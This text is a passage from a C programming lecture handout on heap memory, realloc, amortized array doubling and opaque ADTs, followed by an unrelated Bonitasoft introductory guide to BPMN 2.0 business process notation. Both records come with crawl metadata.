\log n)$. Using dynamic (heap) memory, a function can obtain memory that persists after the function has returned. ```c // build_array(n) returns a new array initialized with values a[0] = 0, a[1] = 1, ... a[n-1] = n-1 // effects: allocates a heap array (caller must free) int *build_array(int len) { assert(len > 0); int *a = malloc(len * sizeof(int)); for (int i=0; i < len; ++i) { a[i] = i; } return a; // array exists beyond function return } ``` The caller (client) is responsible for freeing the memory (the contract should communicate this). The `<string.h>` function `strdup` makes a duplicate of a string. ```c // my_strdup(s) makes a duplicate of s // effects: allocates memory (caller must free) cchar *my_strdup(const cchar *s) { cchar *newstr = malloc((strlen(s) + 1) * sizeof(cchar)); strcpy(newstr, s); return newstr; } ``` Recall that the `strcpy(dest, src)` copies the characters from `src` to `dest`, and that the `dest` array must be large enough. When allocating memory for strings, don’t forget to include space for the null terminator. `strdup` is not officially part of the C standard, but common. Resizing arrays Because `malloc` requires the size of the block of memory to be allocated, it does not seem to solve the problem: “What if we do not know the length of an array in advance?” To solve this problem, we can *resize* an array by: - creating a new array - copying the items from the old to the new array - freeing the old array example: resizing an array As we will see shortly, this is not how it is done in practice, but this is an illustrative example. ```c // my_array has a length of 100 int *my_array = malloc(100 * sizeof(int)); // stuff happens... // oops, my_array now needs to have a length of 101 int *old = my_array; my_array = malloc(101 * sizeof(int)); for (int i=0; i < 100; ++i) { my_array[i] = old[i]; } free(old); ``` realloc To make resizing arrays easier, there is a `realloc` function. ```c // realloc(p, newsize) resizes the memory block at p // to be newsize and returns a pointer to the // new location, or NULL if unsuccessful // requires: p must be from a previous malloc/realloc // effects: the memory at p is invalid (freed) // time: O(n), where n is newsize ``` Similar to our previous example, `realloc` preserves the contents from the old array location. ```c int *my_array = malloc(100 * sizeof(int)); // stuff happens... my_array = realloc(my_array, 101 * sizeof(int)); ``` The pointer returned by `realloc` may actually be the original pointer, depending on the circumstances. Regardless, after `realloc` only the new returned pointer can be used. You should assume that the parameter of `realloc` was freed and is now invalid. Typically, `realloc` is used to request a larger size and the additional memory is uninitialized. If the size is smaller, the extraneous memory is discarded. ``` realloc(NULL, s) behaves the same as malloc(s). realloc(ptr, 0) behaves the same as free(ptr). ``` Although rare, in practice, ```c my_array = realloc(my_array, newsize); ``` could possibly cause a memory leak if an “out of memory” condition occurs. In C99, an unsuccessful `realloc` returns `NULL` and the original memory block is not `freed`. ```c // safer use of realloc int *tmp = realloc(my_array, newsize); if (tmp) { my_array = tmp; } else { // handle out of memory condition } ``` String I/O: strings of unknown size In Section 08 we saw how reading in strings can be susceptible to buffer overruns. ```c char str[81]; int retval = scanf("%s", str); ``` The target array is often oversized to ensure there is capacity to store the string. Unfortunately, regardless of the length of the array, a buffer overrun may occur. To solve this problem we can continuously resize (`realloc`) an array while reading in only one character at a time. readstr() reads in a non-whitespace string from I/O or returns NULL if unsuccessful effects: allocates memory (caller must free) ```c char *readstr(void) { char c; if (scanf(" %c", &c) != 1) return NULL; // ignore initial WS int len = 1; char *str = malloc(len * sizeof(char)); str[0] = c; while (1) { if (scanf("%c", &c) != 1) break; if (c == ' ' || c == '\n') break; ++len; str = realloc(str, len * sizeof(char)); str[len - 1] = c; } str = realloc(str, (len + 1) * sizeof(char)); str[len] = '\0'; return str; } ``` Amortized analysis Unfortunately, the running time of `readstr` is $O(n^2)$, where $n$ is the length of the string. This is because `realloc` is $O(n)$ and occurs inside of the loop. A better approach might be to allocate more memory than necessary and only call `realloc` when the array is “full”. A popular strategy is to double the size of the array when it is full. Similar to working with maximum-length arrays, we need to keep track of the “actual” length in addition to the allocated length. char *readstr(void) { char c; if (scanf(" %c", &c) != 1) return NULL; // ignore initial WS int maxlen = 1; int len = 1; char *str = malloc(maxlen * sizeof(char)); str[0] = c; while (1) { if (scanf("%c", &c) != 1) break; if (c == ' ' || c == '\n') break; if (len == maxlen) { maxlen *= 2; str = realloc(str, maxlen * sizeof(char)); } ++len; str[len - 1] = c; } str = realloc(str, (len + 1) * sizeof(char)); str[len] = '\0'; return str; } With our “doubling” strategy, most iterations will be $O(1)$, unless it is necessary to resize (realloc) the array. The resizing time for the first 32 iterations would be: \[2,4,0,8,0,0,0,16,0,0,0,0,0,0,0,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64\] For $n$ iterations, the total resizing time is at most: \[2 + 4 + 8 + \ldots + \frac{n}{4} + \frac{n}{2} + n + 2n = 4n - 2 = O(n).\] By using this doubling strategy, the total run time for readstr is now only $O(n)$. In other words, the amortized (“average”) time for each iteration is: \[O(n)/n = O(1).\] ADTs in C With dynamic memory, we now have the ability to implement an Abstract Data Type (ADT) in C. In Section 02, the first ADT we saw was a simple account ADT, which stored a username and a password. It demonstrated information hiding, which provides both security and flexibility. We will also need to use opaque structures (incomplete declarations without fields), as introduced in Section 06. example: account ADT In the interface, we only provide an incomplete declaration. In addition to the normal operations, we provide functions to create and destroy instances of the ADT. // account.h -- a simple account ADT module struct account; // incomplete // create_account(username, password) creates an account // with the given username and password // effects: allocates memory (client must call destroy_account) struct account *create_account(const char *username, const char *password); // destroy_account(acc) removes all memory for acc // effects: memory at acc is free’d and invalid void destroy_account(struct account *acc); Because the interface only provides an incomplete declaration, the **client** does not know the fields of the **account** structure. The client can only define a **pointer** to the structure, which is **returned** by **create_account**. ```c // client.c #include "account.h" char username[9]; char password[41]; // ... struct account *my_account = create_account(username, password); // ... destroy_account(my_account); ``` The complete structure declaration only appears in the implementation. ```c // account.c struct account { char *uname; char *pword; }; ``` Create account returns a pointer to a new account. ```c struct account *create_account(const char *username, const char *password) { struct account *a = malloc(sizeof(struct account)); a->uname = malloc((strlen(username) + 1) * sizeof(char)); strcpy(a->uname, username); a->pword = malloc((strlen(password) + 1) * sizeof(char)); strcpy(a->pword, password); return a; } ``` It makes duplicates of the username and password strings provided by the client. In C, our ADT also requires a `destroy_account` to `free` the memory created (both the fields and the structure itself). ```c void destroy_account(struct account *a) { free(a->username); free(a->password); free(a); } ``` The remaining operations are straightforward. ```c const char *get_username(const struct account *acc) { return acc->uname; } bool is_correct_password(const struct account *acc, const char *word) { return (strcmp(acc->pword, word) == 0); } ``` Implementing a Stack ADT As discussed in Section 02, the account ADT illustrates the principles of an ADT, but it is not a typical ADT. The **Stack ADT** (one of the *Collection ADTs*) is more representative. The interface is nearly identical to the stack implementation from Section 08 that demonstrated *maximum-length arrays*. The only differences are: it uses an opaque structure, it provides `create` and `destroy` functions, and there is no maximum: it can store an arbitrary number of integers. // stack.h (INTERFACE) struct stack; struct stack *create_stack(void); bool stack_is_empty(const struct stack *s); int stack_top(const struct stack *s); int stack_pop(struct stack *s); void stack_push(int item, struct stack *s); void stack_destroy(const struct stack *s); The Stack ADT uses the “doubling” strategy. // stack.c (IMPLEMENTATION) struct stack { int len; int maxlen; int *data; }; struct stack *create_stack(void) { struct stack *s = malloc(sizeof(struct stack)); s->len = 0; s->maxlen = 1; s->data = malloc(s->maxlen * sizeof(int)); return s; } The doubling is implemented in push. **destroy** must **free** the field and the structure itself. // Time: O(1) [amortized] void stack_push(int item, struct stack *s) { assert(s); if (s->len == s->maxlen) { s->maxlen *= 2; s->data = realloc(s->data, s->maxlen * sizeof(int)); } s->data[s->len] = item; s->len += 1; } void stack_destroy(struct stack *s) { free(s->data); free(s); } The remaining operations are identical to the maximum-length implementation. ```c bool stack_is_empty(const struct stack *s) { assert(s); return s->len == 0; } int stack_top(const struct stack *s) { assert(s); assert(s->len); return s->data[s->len - 1]; } int stack_pop(struct stack *s) { assert(s); assert(s->len); s->len -= 1; return s->data[s->len]; } ``` As discussed earlier, the *amortized* run-time for `push` is $O(1)$. You will use *amortized* analysis in CS 240 and in CS 341. In this implementation, we never “shrink” the array when items are popped. A popular strategy is to reduce the size when the length reaches $\frac{1}{4}$ of the maximum capacity. Although more complicated, this also has an *amortized* run-time of $O(1)$ for an arbitrary sequence of `pushes` and `pops`. Languages that have a built-in resizable array (*e.g.*, C++’s `vector`) often use a similar “doubling” strategy. Goals of this Section At the end of this section, you should be able to: - describe the heap - use the functions `malloc`, `realloc` and `free` to interact with the heap - explain that the heap is finite, and demonstrate how to use `check malloc` for success - describe memory leaks, how they occur, and how to prevent them • describe the doubling strategy, and how it can be used to manage dynamic arrays to achieve an amortized $O(1)$ run-time for additions • create dynamic resizable arrays in the heap • write functions that create and return a new struct • document dynamic memory side-effects in contracts
{"Source-Url": "https://www.student.cs.uwaterloo.ca/~cs136/handouts/10-dynamic-memory-post.pdf", "len_cl100k_base": 4927, "olmocr-version": "0.1.53", "pdf-total-pages": 44, "total-fallback-pages": 0, "total-input-tokens": 63346, "total-output-tokens": 6834, "length": "2e12", "weborganizer": {"__label__adult": 0.00040221214294433594, "__label__art_design": 0.000263214111328125, "__label__crime_law": 0.0002689361572265625, "__label__education_jobs": 0.000885009765625, "__label__entertainment": 6.502866744995117e-05, "__label__fashion_beauty": 0.00014662742614746094, "__label__finance_business": 0.00010961294174194336, "__label__food_dining": 0.0004627704620361328, "__label__games": 0.0006093978881835938, "__label__hardware": 0.0010709762573242188, "__label__health": 0.0004122257232666016, "__label__history": 0.00021696090698242188, "__label__home_hobbies": 9.888410568237303e-05, "__label__industrial": 0.00040841102600097656, "__label__literature": 0.00024580955505371094, "__label__politics": 0.00020945072174072263, "__label__religion": 0.0005307197570800781, "__label__science_tech": 0.0088348388671875, "__label__social_life": 8.928775787353516e-05, "__label__software": 0.00299835205078125, "__label__software_dev": 0.98046875, "__label__sports_fitness": 0.00032448768615722656, "__label__transportation": 0.0005979537963867188, "__label__travel": 0.0002262592315673828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18609, 0.01195]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18609, 0.86023]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18609, 0.7761]], "google_gemma-3-12b-it_contains_pii": [[0, 68, false], [68, 516, null], [516, 516, null], [516, 929, null], [929, 1477, null], [1477, 1759, null], [1759, 2125, null], [2125, 2389, null], [2389, 2510, null], [2510, 3055, null], [3055, 3504, null], [3504, 3931, null], [3931, 4487, null], [4487, 4887, null], [4887, 5242, null], [5242, 5562, null], [5562, 6202, null], [6202, 6705, null], [6705, 7275, null], [7275, 7866, null], [7866, 8209, null], [8209, 8625, null], [8625, 9200, null], [9200, 9720, null], [9720, 10121, null], [10121, 10582, null], [10582, 11180, null], [11180, 11684, null], [11684, 12237, null], [12237, 12793, null], [12793, 13196, null], [13196, 13871, null], [13871, 14300, null], [14300, 14449, null], [14449, 14965, null], [14965, 15454, null], [15454, 15960, null], [15960, 16239, null], [16239, 16561, null], [16561, 17046, null], [17046, 17444, null], [17444, 17993, null], [17993, 18319, null], [18319, 18609, null]], "google_gemma-3-12b-it_is_public_document": [[0, 68, true], [68, 516, null], [516, 516, null], [516, 929, null], [929, 1477, null], [1477, 1759, null], [1759, 2125, null], [2125, 2389, null], [2389, 2510, null], [2510, 3055, null], [3055, 3504, null], [3504, 3931, null], [3931, 4487, null], [4487, 4887, null], [4887, 5242, null], [5242, 5562, null], [5562, 6202, null], [6202, 6705, null], [6705, 7275, null], [7275, 7866, null], [7866, 8209, null], [8209, 8625, null], [8625, 9200, null], [9200, 9720, null], [9720, 10121, null], [10121, 10582, null], [10582, 11180, null], [11180, 11684, null], [11684, 12237, null], [12237, 12793, null], [12793, 13196, null], [13196, 13871, null], [13871, 14300, null], [14300, 14449, null], [14449, 14965, null], [14965, 15454, null], [15454, 15960, null], [15960, 16239, null], [16239, 16561, null], [16561, 17046, null], [17046, 17444, null], [17444, 17993, null], [17993, 18319, null], [18319, 18609, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18609, null]], "pdf_page_numbers": [[0, 68, 1], [68, 516, 2], [516, 516, 3], [516, 929, 4], [929, 1477, 5], [1477, 1759, 6], [1759, 2125, 7], [2125, 2389, 8], [2389, 2510, 9], [2510, 3055, 10], [3055, 3504, 11], [3504, 3931, 12], [3931, 4487, 13], [4487, 4887, 14], [4887, 5242, 15], [5242, 5562, 16], [5562, 6202, 17], [6202, 6705, 18], [6705, 7275, 19], [7275, 7866, 20], [7866, 8209, 21], [8209, 8625, 22], [8625, 9200, 23], [9200, 9720, 24], [9720, 10121, 25], [10121, 10582, 26], [10582, 11180, 27], [11180, 11684, 28], [11684, 12237, 29], [12237, 12793, 30], [12793, 13196, 31], [13196, 13871, 32], [13871, 14300, 33], [14300, 14449, 34], [14449, 14965, 35], [14965, 15454, 36], [15454, 15960, 37], [15960, 16239, 38], [16239, 16561, 39], [16561, 17046, 40], [17046, 17444, 41], [17444, 17993, 42], [17993, 18319, 43], [18319, 18609, 44]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18609, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
711ea357802d9db80abec9653b5cd622ebe797d9
The Ultimate Guide to BPMN 2 Revised and updated The standard that bridges the needs of IT and business for Business Process Management (BPM) Contents Why BPMN Matters 3 What is BPMN? 4 The ABC’s of BPMN 5 A means for business & technical collaboration 6 The 4 categories of BPMN 7 BPMN in 4 categories 8 Workflow 9 Organizing 10 Readability 11 Special behavior 12 The 3 levels of BPMN complexity 13 BPMN at 3 levels of complexity 14 Basic BPMN 15 An example with basic BPMN 16 Intermediate BPMN 17 Intermediate BPMN: activities 18 Intermediate BPMN: sequence flow 19 Intermediate BPMN: gateways 20 Intermediate BPMN events: catch and throw 21 Intermediate BPMN events: messages and signals 22 Intermediate BPMN events: timers and errors 23 Intermediate BPMN in a process model 24 Summary 25 Sources and further reading 26 Why BPMN Matters Business Process Model and Notation 2.0 (BPMN2) is one of the best things to happen in business process management in a long time. Finally, both the business and technical sides of the organization can share a common language – something that they can both understand and that meets their respective needs for precision and flexibility. This shared language is empowering new ways of working together - and it results in the deployment of new and more flexible applications. At Bonitasoft, the leading provider of open source BPM solutions, we are mindful of the power and potential of shared standards. BPMN 2.0 is a natural fit with what we do. And we believe the benefits can become quickly apparent. In fact, the nice thing about BPMN is that it is so structurally sound that once you master the Basic BPMN level elements, your knowledge and capability will improve quickly; you’ll learn what you need from the intermediate BPMN level elements for extending the model, and the technical team will pick up the advanced BPMN level to complete the execution capability. We offer this Ultimate Guide to help you to get familiar with the basics and give BPMN a try. We are convinced you will find it powerful, adaptable and remarkably easy. Whether you are a business professional or a developer, BPMN2 is your path to better processes, improved management, and more efficiency. Miguel Valdes Faura, Bonitasoft CEO and founder What is **BPMN**? The ABC’s of BPMN If you’ve heard of BPMN but aren’t really sure what it is or what it does, you are not alone. But, before we talk about what BPMN is, let’s talk about what it is not... It is not a “system.” You can’t “buy” a BPMN – it is a standard for business process collaboration and for IT development. It is not just for business or just for IT— it is a shared, common language. It is not only for experts. If you are at all familiar with flow charting, you can dive in immediately. **BPMN = BPM + N** A business process model is a representation of an organization’s processes. A model can be analyzed and improved. **Definitions** **BPM** Business Process Management The discipline of managing processes as the means for improving business performance outcomes¹ **BPMN** Business Process Model and Notation A graphical representation for specifying business processes in a business process model² **BPMS** Business Process Management Suite Application infrastructure to support BPM projects and programs... from process discovery, definition and design to implementation, monitoring and analysis, and through ongoing optimization¹ 1 Gartner Research 2 Object Management Group **Notation** consists of graphic symbols to represent action, flow, or behavior of a process. In a BPMS, BPMN notation represents coding instructions that are executable. BPMN provides a notation that can be readily understandable by all users: - from the business analysts who model the processes conceptually, - to the technical developers responsible for implementing the technology for the processes, - to the people who will manage and monitor the processes. See More What is BPM? BPMN provides a way to quickly diagram business functions. Use it to draw a process graphically. The visual model will be translated quickly and easily into software that will run the process. With BPMN, business people can define what they want, simply but with a high degree of precision; and IT professionals can communicate with each other and with business people about the model in a clear, common framework. BPMN works for any kind of management, operation and support process. By developing a model with BPMN, you can collaboratively improve communications with decision makers about the nature and health of a process; you can collaboratively initiate improvements – and you can collaboratively move toward automating those improvements. BPMN may look familiar BPMN has been around for almost a decade and much in BPMN2 remains from the 1.0 version, especially the shapes and symbols. One thing that has changed “behind the scenes” is the adoption of XML interchange format and the support BPMN 2.0 provides for turning a model and its notation into an executable process. Open source and proprietary BPM vendors now have the capacity to take BPMN 2.0 input and turn it into process automation. BPMN is not an execution language. It is designed to be “consumed” by process engines and made into executable processes. source: Business Process Model and Notation, Version 2, January 2011 by OMG The 4 categories of BPMN BPMN in 4 categories The BPMN2 spec is long, dense and relatively complex We can approach it by organizing BPMN elements into a few general categories. With just a few elements from first three categories you can draw a business process diagram and begin to build and understand a process. Let’s look more closely at what they represent. In the BPMN2 spec - 98 visual elements - 508 pages - 300 figures - 313 tables - 3 annexes - 13 collaborating groups <table> <thead> <tr> <th>Workflow</th> <th>Organizing</th> <th>Readability</th> <th>Special behavior</th> </tr> </thead> <tbody> <tr> <td>Activities</td> <td>Pools</td> <td>Annotation</td> <td>Messages</td> </tr> <tr> <td>Events</td> <td>Swimlanes or lanes</td> <td>Links</td> <td>Signals</td> </tr> <tr> <td>Gateways</td> <td></td> <td></td> <td>Timers</td> </tr> <tr> <td>Sequence flow</td> <td></td> <td></td> <td>Errors</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Repeating</td> </tr> </tbody> </table> Workflow Workflow includes activities, gateways, events, and the sequence flow that connects them. Each of these elements have several types, and all of these types can be connected in a sequence. **Activities** Tasks that are performed in the process- by humans, by automation, or that activate subprocesses **Events** Used to start or end a process, and to manage specific actions during a workflow; it triggers or is the result of something external of the process flow **Gateways** Used to separate or join process flow **Sequence flow** Used to show how the workflow moves See More Getting Started with BPM The Ultimate Guide to BPMN2 Organizing includes *pools* and *swimlanes*. Think of these as the container for the process flow. **Pool** Contains a single, complete process. Workflow cannot leave a pool - we need to transfer action or data from one pool/process to another using other means. **Swimlane** Used to help organize the process based on who does what. In a lap pool, swimlanes keep the swimmers from crashing into one another. Workflow crosses swimlane boundaries as if they did not exist – they are purely for organizational clarity. Readability includes annotations and links. These elements help make a model readable. They have no effect at all on the actual process flow. Text annotation Allow you to paste notes all over a model with explanations for clarity (a great tool for beginning modelers!) Links Allow you to cut a process that has become too long to read easily, and simply continue the process on another line. Throw link Catch link See More Bonita BPM documentation: Process Modeling Special behavior includes a specific set of events, repeating, and correlation. These elements allow us to design executable workflow that can behave in complex ways. **Messages and message flow** Used to transfer data from one pool/process to another and to correlate related processes **Signals** Used to broadcast information to other process **Timers** Used to launch periodic activities, or to ensure that an activity happens within a specified deadline **Errors** Used to define behavior when the system encounters error **Correlation** Correlation is used to coordinate progress between two running process instances **Repeating** Used to repeat behavior, such as multiple launches of the same task (multi-instantiation) or repeating the same task (looping) The 3 levels of BPMN complexity BPMN at 3 levels of complexity BPMN symbols serve a dual purpose. They visually represent a process flow. They translate to executable code that allows a visual process model to be executed as an application. Recall that we can organize BPMN modeling elements into a few general categories: - **Workflow** - **Organizing** - **Readability** - **Special behavior** Let's look at these BPMN elements at the three levels of complexity: **Basic, Intermediate and Advanced** <table> <thead> <tr> <th></th> <th>Basic</th> <th>Intermediate</th> <th>Advanced</th> </tr> </thead> <tbody> <tr> <td><strong>Activities</strong></td> <td>Abstract task</td> <td>Human task</td> <td>Event subprocess</td> </tr> <tr> <td></td> <td></td> <td>Service task</td> <td></td> </tr> <tr> <td></td> <td></td> <td>Call activity</td> <td></td> </tr> <tr> <td><strong>Events</strong></td> <td>start</td> <td>Message</td> <td>(special behavior)</td> </tr> <tr> <td></td> <td>end</td> <td>Timer</td> <td></td> </tr> <tr> <td></td> <td></td> <td>Error</td> <td></td> </tr> <tr> <td></td> <td></td> <td>Signal</td> <td></td> </tr> <tr> <td><strong>Gateways</strong></td> <td>Parallel (AND)</td> <td>Inclusive</td> <td></td> </tr> <tr> <td></td> <td>Exclusive (XOR)</td> <td></td> <td></td> </tr> <tr> <td><strong>Sequence flow</strong></td> <td>Sequence flow</td> <td>Conditional flow</td> <td>Looping</td> </tr> <tr> <td></td> <td></td> <td>Default flow</td> <td>Multi-instantation</td> </tr> <tr> <td><strong>Special behavior</strong></td> <td></td> <td></td> <td>Transaction</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Compensation</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Correlation</td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> </tr> </tbody> </table> Note that Basic BPMN is predominantly **visual**. Intermediate and Advanced BPMN becomes **executable**. Basic BPMN is useful for modeling when details have not been worked out. Activities, events, gateways, and sequence flow all have Basic BPMN level versions. Basic activities are abstract, or undefined. Basic events include start and end events. A start begins a process and an end terminates it. **Basic gateways** **Parallel** (also known as AND) All inputs must be received (in any order) before the process can continue. All outputs are activated – process continues in parallel. **Exclusive** (also known as XOR) Only one input is needed for the process to continue. Only one output is followed – a condition is needed to determine which one. **Sequence flow** simply directs process flow from activity to activity. Start with the basics: abstract activity, start and stop events, gateways, and sequence flow. For example, a generic new employee orientation and training process modeled in basic BPMN elements looks like this. Imagine a token being moved through the diagram – like a traditional board game. This can help clarify how the features of the model control the movement of the token as you add complexity. When a start event is triggered, a new “instance” of a process begins. Think through what happens to a single token traversing a single pathway at a time. BPMN 2.0, Thomas Allweyer Intermediate BPMN To make a visual model executable, begin to apply intermediate BPMN. In an executable process, the flow model becomes an actual process application! As you advance with BPMN, begin making your BPMN “executable” – to ultimately turn it into an automated process. BPMN 2.0 is not just a notation. Implemented through a BPMN modeling tool, it provides programming instruction that a process engine uses to execute the process. The previous example is a simple model that clearly shows visually what happens in the process. The example on this page and the next shows how the model is extended as you begin to apply intermediate BPMN. New employee orientation and training process Note that activities have been defined, and default flow has been added. Intermediate BPMN: activities Intermediate-level activities include human, service, and call activity Activities need to be differentiated – is each task performed by a person or is it automated or performed by the software? Or is it a subprocess in its own right? - **Human activity** is a step that must be done by a person - **Service activity** is an automated step - **Call activity** represents a subprocess "Prepare training schedule" is a call activity. It is linked to a subprocess (a "child" of the original parent process). At this point in the process, the "token" is passed to the subprocess, and when it has completed its passage, it is passed back to the parent process. This is a super-useful aspect of BPMN. Using this notation, you can model a top-level parent process that can be quite simple. It can call a series of subprocesses that are entirely independent workflows. This means they can be modeled independently and modified as needed without necessarily changing the parent process. Intermediate BPMN: sequence flow Intermediate-level sequence flow includes **conditional** and **default** flows. Sequence flow in intermediate BPMN needs to be defined as conditional or default, so the “flow token” knows which path to follow. Basic sequence flow is simply automatic (as soon as an activity is completed, the process moves to the next task in the sequence). **Conditional sequence flow** Some specified condition(s) must be met so the process can “choose” the next task from among two or more options. Conditional flow is what it sounds like: an IF-THEN condition is defined. In this (Boolean) example: - If the schedule is ok with the trainer, this condition = true. - If the schedule is NOT ok with the trainer, this condition = false. **Default sequence flow** **Default flow** allows you to direct flow if, for some reason, no conditions are met. The flow token always has a direction to take. Default flow is marked with a `\` Sequence flow can’t cross a pool boundary. To communicate between pools (processes), use *messages or signals*. Intermediate BPMN: gateways The intermediate-level gateway *inclusive* offers finer control of process flow. **Outputs from inclusive gateway** The inclusive gateway can fire multiple outputs simultaneously. It supports conditions on the outgoing sequence flows. **Example** <table> <thead> <tr> <th>Condition</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>amount</td> <td>5000</td> </tr> <tr> <td>color</td> <td>red</td> </tr> </tbody> </table> In this example, flows 2 and 4 meet the flow condition. Flows 1 and 3 do not – so no token passes. **Inputs to inclusive gateway** The inclusive gateway waits for all incoming inputs (tokens). All valid inputs must be received before the process flow can continue. The engine recognizes which inputs it must wait for (i.e., flows 2 and 4). Intermediate BPMN events: catch and throw Intermediate-level events are either *throw* or *catch* events. Mastery of special start, end, and in-flow “intermediate” events is key to mastery of intermediate BPMN. BPMN events are defined generally as “throw” (think of these as senders) and “catch” (think of these as receivers.) **Mix-n-match events** Events can have multiple characteristics. - **solid** - throws or sends events - **empty** - catches or receives events - **green** starts a process - **red** ends a process - **blue** intermediate, takes place within the flow of a process A catch event can be located anywhere along a process flow. The BPMN spec somewhat confusingly refers to this case as an “intermediate event.” If you stick to thinking of events as throw/send and catch/receive, BPMN may be easier to understand. Message, signal and error start events allow you to trigger processes without direct human interaction, as they are set to “catch” information send from elsewhere. “Elsewhere” can mean from a throw event somewhere in another process, and this can be an end event. In this case, the end of one process can trigger the start of another process. Timers too can start processes automatically, by triggering at pre-set intervals. Intermediate BPMN events: messages and signals Messages and signals carry information across pool boundaries. Messages send to single receivers, while signals broadcast widely to many receivers. **Message** You can start a process with a message. In BPMN, message is specifically defined as the means by which data can be transferred between processes. With BPMN you can start a process with data received from a different process. And conversely, if you want to send data to another process, use an intermediate send message (anywhere in the process flow) or an end message. **Signal** Like messages and errors, signals can be caught from elsewhere and can start a process. A single “throw” signal is broadcast widely and can be received by multiple catch signals. This is useful when you want multiple actions to be triggered. Intermediate BPMN events: timers and errors Timers can delay or pause a process, while errors send it on an exception path. Like other intermediate events, timers and errors can start a process - or impose an action within the process flow. Errors can also end a process. **Timer** Timers can be set to "go off" at specific intervals, or specific calendar-linked dates and times. For example, a start timer can go off every 24 hours, or on the first Tuesday of each month. If the timer is a start event, the process starts when the timer goes off. If the timer is located in the process flow, the process waits until the timer goes off – and then it continues. **Error** Like messages, errors can be caught - and can start a process, or a special error path within a sub-process. Messages, signals, timers, and errors specify workflow behavior. Summary With just 4 categories of basic and intermediate BPMN you can begin to build a deployable, executable process application. BPMN is a standard that allows business and IT to share a common language, which makes development of BPM applications for business by IT easier and more efficient. BPMN is both a set of visual modeling elements, and a set of semantics for executable code represented by those elements. Many of the visual elements in BPMN are similar to standard flow chart elements. Modeling with and interpreting models with BPMN is relatively straightforward. BPMN elements can be categorized: - Workflow - Organizing - Readability - Special behavior There are Basic, Intermediate, and Advanced elements in each of these categories. Basic BPMN is useful for modeling. Intermediate BPMN begins to make a model executable. Advanced BPMN fully defines process behavior. If you’re designing a BPM software suite, read the BPMN2 spec... If you’re designing process applications, The Ultimate Guide is what you really need! Sources and further reading *BPMN Method and Style*, 2nd ed, Bruce Silver, October 2011 *OMG Business Process Model and Notation (BPMN)* Version 2.0, January 2011 *BPMN 2.0: Introduction to the Standard for Business Process Modeling*, Thomas Allweyer, February 2010 *See More* Introduction to BPMN Object Management Group The [nearly] Ultimate Guide to Ending Email Overload 5 Common Pitfalls in Process Optimization Manage Purchasing Efficiently with BPM What is BPM?
{"Source-Url": "http://www.downes.ca/files/Ultimate_guide_to_bpmn2.pdf", "len_cl100k_base": 4671, "olmocr-version": "0.1.53", "pdf-total-pages": 26, "total-fallback-pages": 0, "total-input-tokens": 45184, "total-output-tokens": 5425, "length": "2e12", "weborganizer": {"__label__adult": 0.0002536773681640625, "__label__art_design": 0.0006928443908691406, "__label__crime_law": 0.0003428459167480469, "__label__education_jobs": 0.0012493133544921875, "__label__entertainment": 0.00011521577835083008, "__label__fashion_beauty": 0.0001392364501953125, "__label__finance_business": 0.0047607421875, "__label__food_dining": 0.00032210350036621094, "__label__games": 0.0005135536193847656, "__label__hardware": 0.00040340423583984375, "__label__health": 0.0002799034118652344, "__label__history": 0.0001590251922607422, "__label__home_hobbies": 0.0001118779182434082, "__label__industrial": 0.00043654441833496094, "__label__literature": 0.0002663135528564453, "__label__politics": 0.00017523765563964844, "__label__religion": 0.0002765655517578125, "__label__science_tech": 0.00763702392578125, "__label__social_life": 0.0001341104507446289, "__label__software": 0.1304931640625, "__label__software_dev": 0.8505859375, "__label__sports_fitness": 0.00021016597747802737, "__label__transportation": 0.00022780895233154297, "__label__travel": 0.0001697540283203125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20753, 0.01506]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20753, 0.47302]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20753, 0.92354]], "google_gemma-3-12b-it_contains_pii": [[0, 143, false], [143, 866, null], [866, 2314, null], [2314, 2332, null], [2332, 4022, null], [4022, 5434, null], [5434, 5459, null], [5459, 6546, null], [6546, 7194, null], [7194, 7713, null], [7713, 8185, null], [8185, 8957, null], [8957, 8989, null], [8989, 11403, null], [11403, 12128, null], [12128, 12713, null], [12713, 13489, null], [13489, 14503, null], [14503, 15569, null], [15569, 16280, null], [16280, 17550, null], [17550, 18383, null], [18383, 19167, null], [19167, 19232, null], [19232, 20276, null], [20276, 20753, null]], "google_gemma-3-12b-it_is_public_document": [[0, 143, true], [143, 866, null], [866, 2314, null], [2314, 2332, null], [2332, 4022, null], [4022, 5434, null], [5434, 5459, null], [5459, 6546, null], [6546, 7194, null], [7194, 7713, null], [7713, 8185, null], [8185, 8957, null], [8957, 8989, null], [8989, 11403, null], [11403, 12128, null], [12128, 12713, null], [12713, 13489, null], [13489, 14503, null], [14503, 15569, null], [15569, 16280, null], [16280, 17550, null], [17550, 18383, null], [18383, 19167, null], 